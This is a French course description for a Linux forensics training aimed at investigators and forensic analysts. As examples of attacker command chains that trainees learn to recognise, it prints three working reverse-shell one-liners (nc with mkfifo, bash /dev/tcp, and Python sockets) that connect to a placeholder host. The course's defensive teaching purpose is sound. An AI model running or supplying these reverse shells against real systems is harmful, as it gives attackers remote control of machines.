
Linux Forensic niveau 2
Les prochaines dates
Linux Forensic Niv 2
Send download link to:
Descriptif du cours
Cette formation a pour but de former les participants à une utilisation avancée du système GNU/Linux.
A la fin de la formation, les participants seront capables d’utiliser de manière fluide des systèmes GNU/ Linux, de les analyser, de réaliser des analyses en profondeur du système GNU/Linux et de comprendre des enchaînements de commandes utilisés par les attaquants ; par exemple :
o rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
o bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
o python -c ‘import socket, subprocess, os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); \
s.connect((«10.0.0.1»,1234)); \
os.dup2(s.fileno(),0); \
os.dup2(s.fileno(),1); \
os.dup2(s.fileno(),2); \
p=subprocess.call([«/bin/sh»,»-i»]);’
Cette formation est composée d’une partie théorique (30%) et d’exercices pratiques (70%).
Objectifs
A l’issue de la formation, les stagiaires doivent être en mesure :
• De maîtriser le système d’exploitation GNU/Linux (connaissance approfondie du fonctionnement de GNU/Linux de l’arborescence, des services, des applications présentes par défaut) ;
• De savoir faire une analyse forensique d’un système GNU/ Linux cible de type ordinateur de particuliers ;
• De connaître différentes techniques d’analyse permettant de traiter un serveur compromis (analyse de logs, analyse d’artefacts, etc.)
Prérequis & Public Visé
Ce cours est dédié aux personnes souhaitant disposer de bases solides dans l’utilisation du système d’exploitation GNU/Linux.
La dimension investigation numérique donnée à ce cours destine la formation aux enquêteurs et aux analystes forensiques, cependant toute personne désireuse d’en connaître plus sur ce système peut prétendre participer au cours.